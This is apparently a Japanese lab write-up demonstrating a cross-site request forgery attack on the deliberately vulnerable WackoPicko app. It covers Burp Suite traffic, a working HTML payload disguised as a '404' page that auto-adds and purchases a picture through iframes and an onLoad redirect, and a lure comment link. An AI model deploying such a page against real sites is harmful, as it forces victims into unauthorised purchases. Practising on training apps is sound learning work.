shikata ga nai

Private? There is no such things.

WackoPickoでCSRFをやってみた

Hello there, ('ω')ノ

 

WackoPickoをArachniで診断するとCSRFを検出されて。

 

f:id:ThisIsOne:20200811140425p:plain

 

今回は、アカウント作成ではなく購入するアクションをターゲットに。

まずは、下記の攻撃者のアカウントを作成してからログインして。

 scannerx/scannerx1

 

購入までの流れを見てみることに。

下記のURLからID=8の画像を選択して。

 http://192.168.1.85/WackoPicko/pictures/recent.php

 

f:id:ThisIsOne:20200811114940p:plain

 

下記のURLで、Add to Cartを選択して。

 http://192.168.1.85/WackoPicko/pictures/view.php?picid=8

 

f:id:ThisIsOne:20200811115128p:plain

 

さらにContinue to Confirmationを押下すると。

 

f:id:ThisIsOne:20200811115305p:plain

 

最終確認画面が表示されたのでPurchaseボタンを押すと。

 http://192.168.1.85/WackoPicko/cart/confirm.php

 

f:id:ThisIsOne:20200811115617p:plain

 

画像が購入できて。

 http://192.168.1.85/WackoPicko/pictures/purchased.php

 

f:id:ThisIsOne:20200811115807p:plain

 

この一連のURLの流れは、Burp SuiteのHTTP historyで確認できて。

まず、はじめの呼び出しは。

 http://192.168.1.85/WackoPicko/cart/action.php?action=add&picid=8

 

画像をカートに追加する際の呼び出しは。

 http://192.168.1.85/WackoPicko/cart/confirm.php

 

最後に購入のアクションは。

 http://192.168.1.85/WackoPicko/cart/action.php?action=purchase

 

f:id:ThisIsOne:20200811115904p:plain

 

そこで、攻撃者がログインした状態で高い金額で画像をアップして。

 

f:id:ThisIsOne:20200811142111p:plain

 

画像IDを確認して。

 http://192.168.1.85/WackoPicko/pictures/view.php?picid=19

 

f:id:ThisIsOne:20200811131714p:plain

 

次にKali Linuxを起動して、WEBサーバをたちあげて。

これが攻撃者が誘うWEBサーバの位置づけで。

 

f:id:ThisIsOne:20200811123404p:plain

 

下記のHTMLコードでHTMLファイルを作成しておいて。

 

<html>
<head></head>
<body onLoad='window.location="http://192.168.1.85/WackoPicko/cart/action.php?action=purchase";setTimeout("window.close;",1000)'>
<h1>Error 404: Not found</h1>
<iframe src="http://192.168.1.85/WackoPicko/cart/action.php?action=add&picid=19">
<iframe src="http://192.168.1.85/WackoPicko/cart/review.php" >
<iframe src="http://192.168.1.85/WackoPicko/cart/confirm.php">
</iframe>
</iframe>
</iframe>
</body>

 

f:id:ThisIsOne:20200811123759p:plain

 

WackoPickoへもどって。

仕掛けられるユーザのアカウントを作成後にログインして。

 guestuser/guestuser1

 

f:id:ThisIsOne:20200811124354p:plain

 

画像をアップして。

 

f:id:ThisIsOne:20200811124539p:plain

 

確認して。

 

f:id:ThisIsOne:20200811124624p:plain

 

ログアウトすると再度、下記の攻撃者でログインして。

 scannerx/scannerx1

 

f:id:ThisIsOne:20200811131608p:plain

 

さきほど、guestuserがアップした画像に下記のコメントを追加して。

Kali Linuxで作成したHTMLファイルに誘導するように。

 Look <a href="http://192.168.1.79/wacko.html" target="_blank">this</a>

 

f:id:ThisIsOne:20200811125048p:plain

 

その後は、PreviewとCreateを押して投稿を完了し。

 

f:id:ThisIsOne:20200811125237p:plain

 

最後にログアウトして、下記の被害者ユーザでログインして。

  guestuser/guestuser1

 

f:id:ThisIsOne:20200811125456p:plain

 

自分のアップした画像リストを閲覧して。

 

f:id:ThisIsOne:20200811125607p:plain

 

コメントがあることに気づいて、クリックすると。

 

f:id:ThisIsOne:20200811125544p:plain

 

いつも間にか買ってに購入されて。

 

f:id:ThisIsOne:20200811131301p:plain

 

Home画面へ戻ると支払われていることに気づいて。

 Hello guestuser, you got 50 Tradebuxs to spend!

 

f:id:ThisIsOne:20200811131330p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain